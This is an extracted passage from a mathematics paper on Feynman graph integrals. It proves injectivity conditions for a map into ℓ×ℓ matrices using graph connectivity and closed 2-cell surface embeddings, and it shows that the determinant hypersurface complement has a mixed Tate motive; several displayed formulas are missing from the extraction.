Proof. It is possible to regard the polynomial P Γ (p, t) as the restriction to A n of a homogeneous polynomial P Γ (p, x) defined on all of A ℓ 2 . Clearly, such P Γ (p, x) will not be unique, but different choices of P Γ (p, x) will not affect the integral calculation, which all happens inside the linear subspace A n . The simplex σ n is also linearly embedded inside A ℓ 2 , and we denote its image by τ (σ n ). The volume form ω n can also be identified, under such a choice of coordinates in A ℓ 2 with a form ω Γ (x) such that with ξ Γ the (ℓ 2 − n)-frame associated to the linear subspace τ (A n ) ⊂ A ℓ 2 and Notice in particular that if the map τ is injective then one has a well defined map P n−1 → P ℓ 2 −1 , which is otherwise not everywhere defined.
We are interested in the following, heuristically formulated, consequence of Lemma 2.3.
The explicit construction of the normal crossings divisorΣ Γ is given in Lemma 5.1 below. We will further improve on this observation by reformulating it in a way that will only depend on the number of loops ℓ of Γ and on its genus, and not on the specific graph Γ. To this purpose, we will determine subsets of A ℓ 2 which will contain the components of the image τ (∂σ n ) of the boundary of the simplex in A n , independently of Γ (see §3.4).
In any case, this type of results motivates us to determine conditions on the Feynman graph Γ which ensure that the corresponding map τ : A n → A ℓ 2 is injective.
3. Graph theoretic conditions for embeddings 3.1. Injectivity of τ . In the following, we denote by τ i the composition of the map τ of (2.10) with the projection to the i-th row of the matrix η † Λη, viewed as a map of the variables corresponding only to the edges that belong to the i-th loop in the chosen bases of the first homology of the graph Γ.
We first make the following simple observation.
Lemma 3.1. If τ i is injective for i ranging over a set of loops such that every edge of Γ is part of a loop in that set, then τ is itself injective.
Proof. Let (t 1 , . . . , t n ) = (c 1 , . . . , c n ) be in the kernel of τ . Since each (i, j) entry in the target matrix is a combination of edges in the i-th loop, the map τ i must send to zero the tuple of c j 's corresponding to the edges in the i-th loop. Since we are assuming τ i to be injective, that tuple is the zero-tuple. Since every edge is in some loop for which τ i is injective, it follows that every c j is zero, as needed.
The properties detailed in Lemma 2.2 immediately provide a sufficient condition for the maps τ i to be injective. Proof. In this situation, all but at most one edge variable appear by themselves as an entry of the i-th row, and the possible last remaining variable appears summed together with the other variables. More explicitly, if t i1 , . . . , t iv are the variables corresponding to the edges of a loop ℓ i , up to rearranging the entries in the corresponding row of η † Λη and neglecting other entries, the map τ i is given by (t i1 , . . . , t iv ) → (t i1 + · · · + t iv , ±t i1 , . . . , ±t iv ) if ℓ i has no edge not in common with any other loop, and (t i1 , . . . , t iv ) → (t i1 + · · · + t iv , ±t i1 , . . . , ±t iv−1 ) if ℓ i has a single edge t v not in common with any other loop. In either case the map τ i is injective, as claimed. Now we need a sufficiently natural combinatorial condition on the graph Γ that ensures that the conditions of Lemma 3.2 and Lemma 3.1 are fulfilled. We first recall some useful facts about graphs and embeddings of graphs on surfaces which we need in the following.
Every (finite) graph Γ may be embedded in a compact orientable surface of finite genus. The minimum genus of an orientable surface in which Γ may be embedded is the genus of Γ. Thus, Γ is planar if and only if it may be embedded in a sphere, if and only if its genus is 0. It is known that an embedding of a connected graph is minimal genus if and only if it is a 2-cell embedding ( [26], Proposition 3.4.1 and Theorem 3.2.4). We discuss below conditions on the existence of closed 2-cell embeddings, cf. [26], §5.5.
For our purposes, the advantage of having a closed 2-cell embedding for a graph Γ is that the faces of such an embedding determine a choice of loops of Γ, by taking the boundaries of the 2-cells of the embedding together with a basis of generators for the homology of the Riemann surface in which the graph is embedded. Proof. Orient (arbitrarily) the edges of Γ and the faces, and then add the edges on the boundary of each face with sign determined by the orientations. The fact that the closure of each face is a 2-disk guarantees that the boundary is null-homotopic. This produces a number of loops equal to the number f of faces. It is clear that these f loops are not independent: the sum of any f − 1 of them must equal the remaining one, up to sign. Any f − 1 loops, however, will be independent in H 1 (Γ). Indeed, these f − 1 loops, together with 2g generators of the homology of S, generate H 1 (Γ). The homology group H 1 (Γ) has rank 2g + f − 1, as one can see from the Euler characteristic formula so there will be no other relations.
One refers to the chosen one among the f faces as the "external face" and the remaining f − 1 faces as the "internal faces".
Thus, given a closed 2-cell embedding ι : Γ → S, we can use a basis of H 1 (Γ, Z) costructed as in Lemma 3.4 to compute the map τ of (2.10) and the maps τ i of (2.2). We then have the following result. Proof. The injectivity of the f −1 maps τ i follows from Lemma 3.2. If ℓ is a loop determined by an internal face, the variables corresponding to edges in common between ℓ and any other internal loop will appear as (±) individual entries on the row corresponding to ℓ.
Since ℓ has at most one edge in common with the external region, this accounts for all but at most one of the edges in ℓ. By Lemma 3.2, the injectivity of τ i follows. Finally, as shown in Lemma 3.1, the map τ is injective if every edge is in one of the f − 1 loops and the f − 1 maps τ i are injective. The stated condition guarantees that the edge appears in the loops corresponding to the faces separated by that edge. At least one of them is internal, so that every edge is accounted for. Example 3.6. Consider the example of the planar graph in Figure 1. The conditions stated in Lemma 3.5 are evidently satisfied. Edges are marked by circled numbers. The loop corresponding to region 1 consists of edges 1, 2, 3, 4. The corresponding row of η t T η is (t 1 + t 2 + t 3 + t 4 , ±t 4 , ±t 3 , ±t 2 , ±t 1 ) . Region 2 consists of edges 4,5,6,7. Edge 7 is not in any other internal region. The corresponding row of η † Λη is (t 4 + t 5 + t 6 + t 7 , ±t 4 , ±t 5 , ±t 6 ) .
These maps are injective, as claimed. Given the symmetry of the situation, it is clear that all maps τ i (and hence τ as well) are injective for this graph, as guaranteed by Lemma 3.5.
The considerations that follow will allow us to improve on Lemma 3.5, by showing that in natural situations the second condition listed in Lemma 3.5 is automatically satisfied.
3.2. Connectivity of graphs. In this section we review some notions on connectivity for graphs, both for contextual reasons, since these notions relate well with conditions that are natural from the physical point of view, and in order to improve the results obtained above.
Given a graph Γ and a vertex v ∈ V (Γ), the graph Γ v is the graph with vertex set V (Γ) {v} and edge set E(Γ) {e : v ∈ ∂(e)}, i.e. the graph obtained by removing from Γ the star of the vertex v. It is customary to refer to Γ v simply as "the graph obtained by removing the vertex v", even though one in fact removes also all the edges adjacent to v.
There are two different notions of connectivity for graphs. To avoid confusion, we refer to them here as k-edge-connectivity and k-vertex-connectivity. For the notion of k-vertex connectivity we follow [26] p.11, though in our notation graphs include the case of multigraphs.
Definition 3.7. The notions of k-edge-connectivity and k-vertex-connectivity are defined as follows: • A graph is k-edge-connected if it cannot be disconnected by removal of any set of k − 1 (or fewer) edges. • A graph is 2-vertex-connected if it has no looping edges, it has at least 3 vertices, and it cannot be disconnected by removal of a single vertex, where vertex removal is defined as above. • For k ≥ 3, a graph is k-vertex-connected if it has no looping edges and no multiple edges, it has at least k + 1 vertices, and it cannot be disconnected by removal of any set of k − 1 vertices. Figure 2. A splitting of a graph Γ at a vertex v Thus, 1-vertex-connected and 1-edge-connected simply mean connected, while 2-edgeconnected is the one-particle-irreducible (1PI) condition recalled in Definition 1.1. To see how the condition of 2-vertex-connectivity relates to the physical 1PI condition, we first recall the notion of splitting of a vertex in a graph Γ (cf. [26], §4.2).
and inserting a new edge e to whose end vertices v 1 and v 2 the edges in the two sets E 1 and E 2 are respectively attached (see Figure 2).
We have the following relation between 2-vertex-connectivity and 2-edge-connectivity (1PI). The first observation will be needed in the proof of Proposition 3.13; the second is offered mostly for contextual reasons. ( Proof. (1): We have to show that, for a graph Γ with at least 3 vertices and no looping edges, 2-vertex-connectivity implies 2-edge-connectivity. Assume that Γ is not 1PI. Then there exists an edge e such that Γ e has two connected components Γ 1 and Γ 2 . Since Γ has no looping edges, e has two distinct endpoints v 1 and v 2 , which belong to the two different components after the edge removal. Since Γ has at least 3 vertices, at least one of the two components contains at least two vertices. Assume then that there exists v = v 1 ∈ V (Γ 1 ). Then, after the removal of the vertex v 1 from Γ, the vertices v and v 2 belong to different connected components, so that Γ is not 2-vertex-connected.
(2): We need to show that 2-vertex-connectivity is equivalent to all splittings Γ ′ being 1PI. Suppose first that Γ is not 2-vertex-connected. Since Γ has at least 3 vertices and no looping edges, the failure of 2-vertex-connectivity means that there exists a vertex v whose removal disconnects the graph. Let V ⊂ V (Γ) be the set of vertices other than v that are endpoints of the edges adjacent to v. This set is a union V = V 1 ∪ V 2 where the vertices in the two subsets V i are contained in at least two different connected components of Γ v. Then the splitting Γ ′ of Γ at v obtained by inserting an edge e such that the endpoints v 1 and v 2 are connected by edges, respectively, to the vertices in V 1 and V 2 is not 1PI.
Conversely, assume that there exists a splitting Γ ′ of Γ at a vertex v that is not 1PI. There exists an edge e of Γ ′ whose removal disconnects the graph. If e already belonged to Γ, then Γ would not be 1PI (and hence not 2-vertex connected, by (1)), as removal of e would disconnect it. So e must be the edge added in the splitting of Γ at the vertex v.
Let v 1 and v 2 be the endpoints of e. None of the other edges adjacent to v 1 or v 2 is a looping edge, by hypothesis; therefore there exist at least another vertex v ′ Since v ′ 1 and v ′ 2 are in Γ v, and Γ v is contained in Γ ′ e, it follows that removing v from Γ would also disconnect the graph. Thus Γ is not 2-vertex-connected.
The first statement in Lemma 3.9 admits the following analog for 3-connectivity.
Lemma 3.10. Let Γ be a graph with at least 4 vertices, with no looping edges and no multiple edges. Then 3-vertex-connectivity implies 3-edge-connectivity.
Proof. We argue by contradiction. Assume that Γ is 3-vertex-connected but not 2PI. We know it is 1PI because of the previous lemma. Thus, there exist two edges e 1 and e 2 such that the removal of both edges is needed to disconnect the graph. Since we are assuming that Γ has no multiple or looping edges, the two edges have at most one end in common.
Suppose first that they have a common endpoint v. Let v 1 and v 2 denote the remaining two endpoints, v i ∈ ∂e i , v 1 = v 2 . If the vertices v 1 and v 2 belong to different connected components after removing e 1 and e 2 , then the removal of the vertex v disconnects the graph, so that Γ is not 3-vertex-connected (in fact not even 2-vertex-connected). If v 1 and v 2 belong to the same connected component, then v must be in a different component. Since the graph has at least 4 vertices and no multiple or looping edges, there exists at least another edge attached to either If w is adjacent to v, then removing v and v 1 leaves v 2 and w in different connected components. Similarly, if w is adjacent to (say) v 1 , then the removal of the two vertices v 1 and v 2 leave v and w in two different connected components. Hence Γ is not 3-vertex-connected.
Next, suppose that e 1 and e 2 have no endpoint in common. Let v 1 and w 1 be the endpoints of e 1 and v 2 and w 2 be the endpoints of e 2 . At least one pair {v i , w i } belongs to two separate components after the removal of the two edges, though not all four points can belong to different connected components, else the graph would not be 1PI. Suppose then that v 1 and w 1 are in different components. It also cannot happen that v 2 and w 2 belong to the same component, else the removal of e 1 alone would disconnect the graph. We can assume then that, say, v 2 belongs to the same component as v 1 while w 2 belongs to a different component (which may or may not be the same as that of w 1 ). Then the removal of v 1 and w 2 leaves v 2 and w 1 in two different components so that the graph is not 3-vertex-connected.
Remark 3.11. While the 2-edge-connected hypothesis on Feynman graphs is very natural from the physical point of view, since it is just the 1PI condition that arises when one considers the perturbative expansion of the effective action of the quantum field theory (cf. [22]), conditions of 3-connectivity (3-vertex-connected or 3-edge-connected) arise in a more subtle manner in the theory of Feynman integrals, in the analysis of Laundau singularities (see for instance [29]). In particular, the 2PI effective action is often considered in quantum field theory in relation to non-equilibrium phenomena, see e.g. [28], §10.5.1.
Connectivity and embeddings.
We now recall another property of graphs on surfaces, namely the face width of an embedding ι : Γ ֒→ S. The face width f w(Γ, ι) is the largest number k ∈ N such that every non-contractible simple closed curve in S intersects Γ at least k times. When S is a sphere, hence ι : Γ ֒→ S is a planar embedding, one sets f w(Γ, ι) = ∞.
Remark 3.12. For a graph Γ with at least 3 vertices and with no looping edges, the condition that an embedding ι : Γ ֒→ S is a closed 2-cell embedding is equivalent to the properties that Γ is 2-vertex-connected and that the embedding has face width f w(Γ, ι) ≥ 2, see Proposition 5.5.11 of [26].
In particular, this implies that a planar graph with at least three vertices and no looping edges admits a closed 2-cell embedding in the sphere if and only if it is 2-vertex-connected. Notice that the condition that Γ has at least 3 vertices and no looping edges is necessary for this statement to be true. For example, the graph with two vertices, one edge between them, and one looping edge attached to each vertex cannot be disconnected by removal of a single vertex, but does not have a closed 2-cell embedding in the sphere. Similarly, the graph consisting of two vertices, one edge between them and one looping edge attached to one of the vertices admits a closed 2-cell embedding in the sphere, but is not 2-vertexconnected. (See Figure 3.) It is not known whether every 2-vertex-connected graph Γ admits a closed 2-cell embedding. The "strong orientable embedding conjecture" states that this is the case, namely, that every 2-vertex-connected graph Γ admits a closed 2-cell embedding in some orientable surface S, of face width at least two (see [26], Conjecture 5.5.16).
We are now ready for the promised improvement of Lemma 3.5.
Proposition 3.13. Let Γ be a graph with at least 3 vertices and with no looping edges, which is closed-2-cell embedded in an orientable surface S. Then, if any two of the faces have at most one edge in common, the map τ is injective.
Proof. It suffices to show that, under these conditions on the graph Γ, the second condition of Lemma 3.5 is automatically satisfied, so that only the first condition remains to be checked. That is, we show that every edge of Γ is in the boundary of two faces.
Assume an edge is not in the boundary of two faces. Then that edge must bound the same face on both of its sides, as in Figure 4. The closure of the face is a cell, by assumption. Let γ be a path from one side of the edge to the other. Since γ splits the cell into two connected components, it follows that removing the edge splits Γ into two connected components, hence Γ is not 2-edge-connected. However, as recalled in Remark 3.12, the fact that Γ has at least 3 vertices and no looping edges and it admits a closed 2-cell embedding implies that Γ is 2-vertex-connected, hence in particular it is 1PI by the first part of Lemma 3.9, and this gives a contradiction.
The condition that Γ has at least 3 vertices and no looping edges is necessary for Proposition 3.13. For example, the second graph shown in Figure 3 does not satisfy the property that each edge is in the boundary of two faces; in the case of this graph, clearly the map τ is not injective.
Here is another direct consequence of the previous embedding results. Proof. The result of Proposition 3.13 shows that the second condition stated in Lemma 3.5 is automatically satisfied, so the only thing left to check is that the first condition stated in Lemma 3.5 holds. Assume that two faces F 1 , F 2 have more than one edge in common, see Figure 5. Since F 1 , F 2 are (path-)connected, there are paths γ i in F i connecting corresponding sides of the edges. With suitable care, it can be arranged that γ 1 ∪ γ 2 is a closed path γ meeting Γ in 2 points, see Figure 5. Since the embedding has face width ≥ 3, γ must be null-homotopic in the surface, and in particular it splits it into two connected components. This implies that Γ is split into two connected components by removing the two edges, hence Γ cannot be 3-edge-connected.
The 3-edge-connectivity hypothesis in Proposition 3.14 can be viewed as the next step strengthening of the 1PI condition, cf. Remark 3.11. Similarly, the condition of the face width of the embedding f w(Γ, ι) ≥ 3 is the next step strengthening of the condition f w(Γ, ι) ≥ 2 conjecturally implied by 2-vertex-connectivity.
In fact, if we enhance in Proposition 3.14 the 3-edge-connected hypothesis with 3vertex-connectivity (see Lemma 3.10), we can refer to a result of graph theory ( [26], Proposition 5.5.12) which shows that for a 3-vertex-connected graph it is equivalent to admit an embedding with f w(Γ, ι) ≥ 3 and to have the wheel neighborhood property, that is, every vertex of Γ has a wheel neighborhood. Another equivalent condition to f w(Γ, ι) ≥ 3 for a 3-vertex-connected graph is that the loops determined by the faces of the embedding as in Lemma 3.4 are either disjoint or their intersection is just a vertex or a single edge ( [26], Proposition 5.5.12). For example, we can formulate an analog of Proposition 3.14 in the following way. The results derived in this section thus identify classes of graphs that satisfy simple geometric properties for which the injectivity of the map τ holds.
3.4. Dependence on Γ. The preceding results refer to the injectivity of the maps τ i , τ determined by a given graph Γ, where τ maps an affine space A n (where n is the number of internal edges of Γ) to A ℓ 2 (where ℓ is the number of loops of Γ), by means of the matrix M Γ (t). The whole matrix M Γ (t) depends of course on the graph Γ. However, the injectivity of τ may be detected by a suitable submatrix. In the following statement, choose a basis for H 1 (Γ, Z) as prescribed in Lemma 3.4; thus, f − 1 = ℓ − 2g rows of M Γ (t) correspond to the 'internal' faces in an embedding of Γ. Proof. Indeed, under the given assumptions, every edge appears in the loop corresponding to some internal face of the embedding. The argument proving Lemma 3.5 shows that the given minor determines the injectivity of τ .
A further refinement of the foregoing considerations will allow us to obtain statements that will be to some extent independent of Γ, and only hinge on ℓ = b 1 (Γ) and the genus g of Γ.
We have pointed out earlier ( §2.1) that det M Γ (t) does not depend on the choice of orientation for the loops of Γ. It is however advantageous to make a coherent choice for these orientations. We are now assuming that we have chosen a closed 2-cell embedding of Γ into an orientable surface of genus g; such an embedding has f faces, where ℓ = 2g+f −1; we can arrange M Γ (t) so that the first f − 1 rows correspond to the f − 1 loops determined by the 'internal' faces of the embedding.
On each face, choose the positive orientation (counterclockwise with respect to an outgoing normal vector). Then each edge-variable in common between two faces i, j will appear with a minus sign in the entries (i, j) and (j, i) of M Γ (t). These entries are both in the (ℓ − 2g) × (ℓ − 2g) upper-left minor, which is the minor singled out in Lemma 3. 16.
The upshot is that in the cases covered by the above results (such as Proposition 3.13), the edge variables t e can all be obtained by either pulling-back entries −x ij with 1 ≤ i < j ≤ ℓ − 2g, or a sum Note that these expressions only depend on ℓ and g; it follows that all components of the image τ (∂σ n ) in A ℓ 2 of the boundary of the simplex σ n can be realized as pull-backs of subspaces of A ℓ 2 from a list which only depends on the number ℓ − 2g (= f − 1, where f is the number of faces in a closed 2-cell embedding of Γ). This observation essentially emancipates the domain of integration in the integral appearing in the statement of Lemma 2.3 from the specific graph Γ.
We will return to this point in §5, cf. Proposition 5.2.
3.5. More general graphs. The previous combinatorial statements were obtained under the assumption that the graphs have no looping edges. However, the statement can then be generalized easily to the case with looping edges using the following observation. Proof. Let t be the variable assigned to the looping edge and t e the variables assigned to the edges of Γ ′ . The matrix M Γ (t, t e ) is of the block diagonal form .
This proves the statement.
This allows us to extend the results of Proposition 3.14 and Corollary 3.15 to all graphs obtained by attaching an arbitrary number of looping edges at the vertices of a graph satisfying the hypothesis of Proposition 3.14 or Corollary 3.15.
Corollary 3.18. Let Γ be a graph such that, after removing all the looping edges, the remaining graph is 3-vertex-connected with a wheel neighborhood at each vertex. Then the maps τ i , τ are all injective.
We can further extend the class of graphs to which the results of this section apply by including those graphs that are obtained from graphs satisfying the hypotheses of Proposition 3.13, Proposition 3.14, Corollary 3.15, or Corollary 3.18 by subdividing edges.
Let e n be the edge of Γ that is subdivided in two edges e ′ n and e ′′ n to form the graph Γ ′ . The effect on the graph polynomial is . . . , t n−1 , t ′ n + t ′′ n ), since the spanning trees of Γ ′ are obtained by adding either e ′ n or e ′′ n to those spanning trees of Γ that do not contain e n and by replacing e n with e ′ n ∪ e ′′ n in the spanning trees of Γ that contain e n . Thus, notice that in this case the injectivity of the map τ is not preserved by the operation of splitting edges. However, one can check directly that this operation does not affect the nature of the period computed by the Feynman integral, as the following result shows, so that any result that will show that the Feynman integral is a period of a mixed Tate motive for a class of graphs with no valence two vertices will automatically extend to graphs obtained by splitting edges.
Proposition 3.19. Let Γ ′ be a graph obtained from a given graph Γ by subdividing one of the edges by inserting a valence two vertex. Then the parametric Feynman integral for Γ ′ will be of the form Proof. When one subdivides an edge as above, the Feynman rules imply that one finds as corresponding Feynman integral an expression of the form where the q i (k i ) = k 2 i + m 2 are the quadratic forms that give the propagators associated to the internal edges of the graph. We have used the constraint δ(k n − k n+1 ) for the two momentum variables associated to the two parts of the split edge, so that we find q 2 n in the denominator. One then uses the usual formula 1 q a1 1 · · · q an n = Γ(a 1 + · · · + a n ) Γ(a 1 ) · · · Γ(a n ) R n to obtain the parametric form of the Feynman integral. In our case this gives 1 q 1 · · · q n−1 q 2 n = n! σn t n dt 1 · · · dt n (t 1 q 1 + · · · t n q n ) n+1 .
Thus, one obtains the parametric form of the Feynman integral as . This gives (3.1).
In particular Proposition 3.19 shows that the parametric Feynman integral for the graph Γ ′ is still a period of the same type as that of the graph Γ, since it is still a period associated to the complement of the graph hypersurfaceX Γ and evaluated over the same simplex σ n . Only the algebraic differential form changes from Ψ −D/2 Γ V Γ (t, p) −n+Dℓ/2 ω n to Ψ −D/2 Γ V Γ (t, p) −(n+1)+Dℓ/2 t n ω n , but this does not affect the nature of the period, at least in the "stable range" where D is sufficiently large (Dℓ/2 > n).
The motive of the determinant hypersurface complement
Our work in §2 and §3 relates the complexity of a Feynman integral over a graph satisfying suitable combinatorial conditions to the complexity of the motive whose realizations give the relative cohomology of the pair of the complement of the determinant hypersurface and a normal crossings divisorΣ Γ containing the image of the boundary τ Γ (∂σ n ), as in Lemma 5.1 below (see Corollary 2.4, Proposition 3.13 and ff.). In this section we exhibit an explicit filtration of the complement of the determinant hypersurface, from which we can directly prove that the motive of A ℓ 2 D Γ is mixed Tate. We use this filtration to compute explicitly the class of A ℓ 2 D Γ in the Grothendieck group of varieties, as well as the class of the projective version P ℓ 2 −1 D ℓ . Notice that the mixed Tate nature of the motive of the determinant hypersurface also follows directly from the results of Belkale-Brosnan [3], or from those of Biglari [5], [6], but we prefer to give here a very explicit computation, which will be useful as a preliminary for the similar but more involved analysis of the loci that contain the boundary of the domain of integration that we discuss in the following sections.
4.1. The motive. As we already argued, it is more natural to consider the graph hyper-surfacesX Γ in the affine space A n , instead of the projective X Γ in P n−1 . Thus, here also we work with the affine space A ℓ 2 parametrizing ℓ × ℓ matrices. The coneD ℓ over the determinant hypersurface consists of matrices of rank < ℓ. Realizing the complement of D ℓ in A ℓ 2 amounts then to 'parametrizing' matrices M of rank exactly ℓ.
It is clear how this should be done: -The first row of M must be a nonzero vector v 1 ; -The second row of M must be a vector v 2 that is nonzero modulo v 1 ; -The third row of M must be a vector v 3 that is nonzero modulo v 1 and v 2 ; -And so on.
To formalize this construction, let E be a fixed ℓ-dimensional vector space, and work inductively. The first steps of the construction are as follows.
-Denote by W 1 the variety E {0}; -Note that W 1 is equipped with a trivial vector bundle E 1 = E × W 1 , and with a line bundle S 1 := L 1 ⊆ E 1 whose fiber over v 1 ∈ W 1 consists of the line spanned by v 1 ; -Let W 2 ⊆ E 1 be the complement E 1 L 1 ; -Note that W 2 is equipped with a trivial vector bundle E 2 = E × W 2 , and two line subbundles of E 2 : the pull-back of L 1 (still denoted L 1 ) and the line-bundle L 2 whose fiber over v 2 ∈ W 2 consists of the line spanned by v 2 ; -By construction, L 1 and L 2 span a rank-2 subbundle S 2 of E 2 ; -Let W 3 ⊆ E 2 be the complement E 2 S 2 ; -And so on.
Inductively: at the k-th step, this procedure produces a variety W k , endowed with k line bundles L 1 , . . . , L k spanning a rank-k subbundle S k of the trivial vector bundle , and define line subbundles L 1 , . . . , L k to be the pull-backs of the like-named line bundles on W k ; and let L k+1 be the line bundle whose fiber over v k+1 is the line spanned by v k+1 . The line bundles L 1 , . . . , L k+1 span a rank-k + 1 subbundle S k+1 of E k+1 , and the construction can continue. The sequence stops at the ℓ-th step, where S ℓ has rank ℓ, equal to the rank of E ℓ , so that E ℓ S ℓ = ∅.
Lemma 4.1. The variety W ℓ constructed as above is isomorphic to A ℓ 2 D ℓ .
Proof. Each variety W k maps to A ℓ 2 as follows: a point of W k determines k vectors v 1 , . . . , v k , and can be mapped to the matrix whose first k rows are v 1 , . . . , v k resp. (and the remaining rows are 0). By construction, this matrix has rank exactly k. Conversely, any such rank k matrix is the image of a point of W k , by construction.
In particular, we have the following result on the bundles S k involved in the construction described above.
Lemma 4.2. The bundle S k over the variety W k is trivial for all 1 ≤ k ≤ ℓ.
Proof. Points of W k are parameterized by k-tuples of vectors v 1 , . . . , v k spanning S k ⊆ K ℓ × W k = E k . This means precisely that the map Recall that, given a triangulated category D, a full subcategory D ′ is a triangulated subcategory if and only if it is invariant under the shift T of D and for any distinguished triangle Let MD K be the Voevodsky triangulated category of mixed motives over a field K, [33]. The triangulated category DMT K of mixed Tate motives is the full triangulated thick subcategory of MD K generated by the Tate objects Q(n). It is known that, over a number field K, there is a canonical t-structute on DMT K and one can therefore construct an abelian category MT K of mixed Tate motives (see [24]).
We then have the following result on the nature of the motive of the determinant hypersurface complement. Proof. First recall that by Proposition 4.1.4 of [33], over a field K of characteristic zero a closed embedding Y ⊂ X determines a distinguished triangle [1] in MD K . Here we use the notation m(X) for the motivic complex with compact support denoted by C c * (X) in [33]. In particular, if m(Y ) and m(X) are in DMT K then m(X Y ) is isomorphic to an object in DMT K , by the property of full triangulated subcategories recalled above. Similarly, using the invariance of DMT K under the shift, if m(Y ) and m(X Y ) are in DMT K then m(X) is isomorphic to an object in DMT K .
We also know (see §1.2.3 of [8]) that in the Voevodsky category MD K one inverts the morphism X × A 1 → X induced by the projection, so that taking the product with an affine space A k is an isomorphism at the level of the corresponding motives and for the motivic complexes with compact support this gives m(X × A 1 ) = m(X)(−1) [2], see Corollary 4.1.8 of [33]. Thus, for any given m(X) in DMT K , the motive m(X × A k ) is obtained from m(X) by Tate twists and shifts, hence it is also in DMT K .
These two properties of the derived category DMT K of mixed Tate motives suffice to show that the motive of the affine hypersurface complement A ℓ 2 D ℓ is mixed Tate, In fact, one sees from the inductive construction of A ℓ 2 D ℓ described above that at each step we are dealing with varieties defines over K = Q and we now show that, at each step, the corresponding motives are mixed Tate. Single points obviously belong to the category of mixed Tate motives. At the first step, one takes the complement W 1 of a point in an affine space, which gives a mixed Tate motive by the first observation above on distinguished triangles associated to closed embeddings. At the next step one considers the complement of the line bundle S 1 inside the trivial vector bundle E 1 over W 1 . Again, both m(S 1 ) and m(E 1 ) are mixed Tate motives, since both are products by affine spaces by Lemma 4.2 above, hence m(E 1 S 1 ) is also mixed Tate. The same argument shows that, for all 1 ≤ k ≤ ℓ, the motive m(E k S k ) is mixed Tate, by repeatedly using Lemma 4.2 and the two properties of DMT Q recalled above.
4.2.
The class in the Grothendieck ring. Lemma 4.1 suffices to obtain an explicit formula for the class in the Grothendieck ring of varieties of the complement of the determinant hypersurface. This is of course well-known: see for example [3], §3.3.
Proposition 4.4. In the affine case the class in the Grothendieck ring of varieties is
where L is the class of A 1 . In the projective case, the class is Proof. Using Lemma 4.1 one sees inductively that the class of W k is given by This completes the proof.
The class (4.3) can be written equivalently in the form where L = [A 1 ] and T = [G m ] is the class of the multiplicative group. Here the motive L ℓ [P 1 ] · · · [P ℓ−1 ] can be thought of as the motive of the "variety of frames".
(Note however that, for ℓ ≥ 5, coefficients other than 0, ±1 appear in the class.) Thus, the class [D ℓ ] is given, for ℓ = 2 and ℓ = 3 by the expressions The ℓ = 2 case is otherwise evident: D 2 is the set of rank-1, 2 × 2-matrices, and as such it may be realized as P 1 × P 1 , with the indicated class. The ℓ = 3 case can also be easily verified independently.
Relative cohomology and mixed Tate motives
We now assume that Γ is a graph satisfying the condition studied in §2 and §3: the map τ is injective. By Proposition 3.13, this is the case if Γ has at least 3 vertices, no looping edges, and is closed-2-cell embedded in an orientable surface in such a way that any two of the faces determined by the embedding have at most one edge in common. Proposition 3.14 and Corollary 3.15 provide us with specific combinatorial conditions ensuring that this is the case. For instance, all 3-edge connected planar graphs are included in this class.
Also note that by the considerations in §3.5 (especially Lemma 3.17 and Proposition 3.19), any estimate for the complexity of Feynman integrals for graphs satisfying these conditions generalizes automatically to the larger class of graphs obtained from those considered here by adding arbitrarily many looping edges, and by arbitrarily subdividing edges.
Algebraic simplexes and normal crossing divisors.
In our setting and under the injectivity assumption, the property that the Feynman integral (1.9) is a period of a mixed Tate motive (modulo divergences) would follow from showing that a certain relative cohomology is a realization of a mixed Tate motive. Instead of the relative cohomology H n−1 (P n−1 X Γ , Σ n (Σ n ∩ X Γ )) considered in [10], [9], we consider here a different relative cohomology, where the hypersurface complement P n−1 X Γ is replaced by the complement P ℓ 2 −1 D ℓ of the determinant hypersurface, or better its affine counterpart A ℓ 2 D ℓ , and instead of the algebraic simplex Σ n = {t : t 1 · · · t n = 0}, we consider a locusΣ Γ in A ℓ 2 that pulls back to the algebraic simplex Σ n under the map τ of (2.10) and that consists of a union of n linear subspaces of codimension one in A ℓ 2 that meet the image of A n under τ along divisors with normal crossings. The following observation is a direct consequence of the construction of the matrix M Γ (t) (cf. §2.1).
Lemma 5.1. Suppose given a graph Γ such that the corresponding maps τ and τ i are injective. Then the n coordinates t i associated to the internal edges of Γ can be written as preimages via the (injective) map τ : A n → A ℓ 2 of n linear subspaces X i of codimension 1 in A ℓ 2 . These n subspaces form a divisorΣ Γ with normal crossings in A ℓ 2 .
Proof. Consider the various possible cases for a specific edge listed in Lemma 2.2. In the third case listed there, where there are two loops ℓ i , ℓ j containing e, and not having any other edge in common, the variable t e is immediately expressed as the pullback to A n of a coordinate in A ℓ 2 . Consider then the second case listed in Lemma 2.2, where an edge e belongs to a single loop ℓ i . Under the assumption that the map τ i is injective, then any linear combination of the variables corresponding to the edges in the i-th loop may be written as a linear combination of coordinates of the i-th row.
The considerations in §3.4 allow us to improve this observation, by passing to a larger normal crossing divisor, so that one can generate all theΣ Γ from the components of a single normal crossings divisorΣ ℓ,g that only depends on the number of loops of the graph and on the minimal genus of the embedding of the graph on a Riemann surface. We formalize this remark as follows.
Proposition 5.2. There exists a normal crossings divisorΣ ℓ,g ⊂ A ℓ 2 , which is a union of N = f 2 linear spaces (5.1)Σ ℓ,g := X 1 ∪ · · · ∪ X N , such that, for all graphs Γ with ℓ loops and genus g closed 2-cell embedding, the preimage under τ = τ Γ of the unionΣ Γ of a subset of components ofΣ ℓ,g is the algebraic simplex Σ n in A n . More explicitly, the divisorΣ ℓ,g can be described by the N = f 2 equations where f = ℓ − 2g + 1 is the number of faces of the embedding.
Proof. Using Lemma 3.16, we know that the injectivity of an (ℓ − 2g) × (ℓ − 2g) minor of the matrix M Γ suffices to control the injectivity of the map τ . We can in fact arrange so that the minor is the upper-left part of the ℓ × ℓ ambient matrix. Then, as in Lemma 5.1, the hyperplanes in A n associated to the coordinates t i can be obtained by pulling back linear spaces along this minor. On the diagonal of the (f − 1) × (f − 1) submatrix we find all edges making up each face, with a positive sign. It follows that the pull-backs of the equations (5.2) produce a list of all the edge variables, possibly with redundancies. The components ofΣ ℓ,g that form the divisorΣ Γ are selected by eliminating those components ofΣ ℓ,g that contain the image of the graph hypersurface (i.e. coming from the zero entries of the matrix M Γ (t)).
